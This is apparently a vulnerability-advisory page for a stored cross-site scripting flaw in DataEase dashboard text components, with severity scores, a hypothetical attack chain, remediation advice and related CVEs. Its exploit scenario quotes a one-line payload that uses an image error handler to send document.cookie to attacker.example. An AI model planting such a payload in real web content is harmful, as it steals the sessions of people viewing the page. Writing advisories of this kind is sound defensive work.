Skip to main content

DataEase EUVDEUVD-2026-42098

| CVE-2026-55647 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-07 GitHub_M
5.1
CVSS 4.0 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

Editor-level authentication required (PR:L); victim must load the dashboard (UI:R); payload executes in victim's browser context causing scope change (S:C); no availability impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

2
Patch available
Jul 07, 2026 - 22:01 EUVD
Analysis Generated
Jul 07, 2026 - 21:48 vuln.today

DescriptionCVE.org

DataEase is an open source data visualization and analysis tool. Prior to 2.10.24, dashboard text components render stored component content with Vue v-html without server-side HTML sanitization, allowing an authenticated user who can edit dashboard component data to inject HTML with executable event handlers that execute when another user or shared-link visitor views the dashboard. This issue is fixed in version 2.10.24.

AnalysisAI

Stored XSS in DataEase dashboard text components allows any authenticated user with edit access to inject HTML containing executable event handlers that fire silently in the browser of every subsequent dashboard viewer, including unauthenticated shared-link recipients. All versions prior to 2.10.24 are affected due to the use of Vue's v-html directive to render stored component content without server-side sanitization. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain authenticated DataEase editor account
Delivery
Navigate to target dashboard text component
Exploit
Inject HTML payload with executable event handler
Install
Save component (payload stored server-side)
C2
Victim or shared-link visitor loads dashboard
Execute
Browser renders v-html content without sanitization
Impact
Event handler executes arbitrary JavaScript in victim session

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated DataEase account with sufficient permission to edit dashboard component data. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 5.1 (Medium) accurately reflects the constrained attack surface. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated DataEase user with dashboard editor access inserts a payload such as `<img src=x onerror="fetch('https://attacker.example/c?d='+document.cookie)">` into a dashboard text component and saves it. Any subsequent viewer - including colleagues with authenticated sessions or external recipients of a shared dashboard link - triggers the payload on page load, silently exfiltrating their session cookie or performing browser-side actions in their context. …
Remediation Upgrade DataEase to version 2.10.24 or later, which introduces server-side HTML sanitization for dashboard text components. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2025-49003 CRITICAL POC
9.8 Jun 26

DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.11, a threat actor m

CVE-2025-49002 CRITICAL POC
9.8 Jun 03

Auth bypass in DataEase via CVE-2025-49001 patch evasion. PoC available.

CVE-2025-49001 CRITICAL POC
9.8 Jun 03

Auth bypass in DataEase BI tool before 2.10.10.

CVE-2025-53005 CRITICAL POC
9.8 Jul 01

A remote code execution vulnerability in DataEase (CVSS 9.8). Risk factors: public PoC available.

CVE-2025-53004 CRITICAL POC
9.8 Jun 30

A remote code execution vulnerability in DataEase (CVSS 9.8). Risk factors: public PoC available.

CVE-2025-53006 CRITICAL POC
9.8 Jul 02

A remote code execution vulnerability in DataEase (CVSS 9.8). Risk factors: public PoC available.

CVE-2026-23958 CRITICAL POC
9.8 Jan 22

DataEase data visualization tool prior to 2.10.19 uses MD5-hashed passwords without salting, allowing attackers to crack

CVE-2024-46997 CRITICAL POC
9.8 Sep 23

DataEase is an open source data visualization analysis tool. Rated critical severity (CVSS 9.8), this vulnerability is r

CVE-2023-37258 CRITICAL POC
9.8 Jul 25

DataEase is an open source data visualization analysis tool. Rated critical severity (CVSS 9.8), this vulnerability is r

CVE-2023-33963 CRITICAL POC
9.8 Jun 01

DataEase is an open source data visualization and analysis tool. Rated critical severity (CVSS 9.8), this vulnerability

CVE-2023-28437 CRITICAL POC
9.8 Mar 25

Dataease is an open source data visualization and analysis tool. Rated critical severity (CVSS 9.8), this vulnerability

CVE-2022-39312 CRITICAL POC
9.8 Oct 25

Dataease is an open source data visualization analysis tool. Rated critical severity (CVSS 9.8), this vulnerability is r

Share

EUVD-2026-42098 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy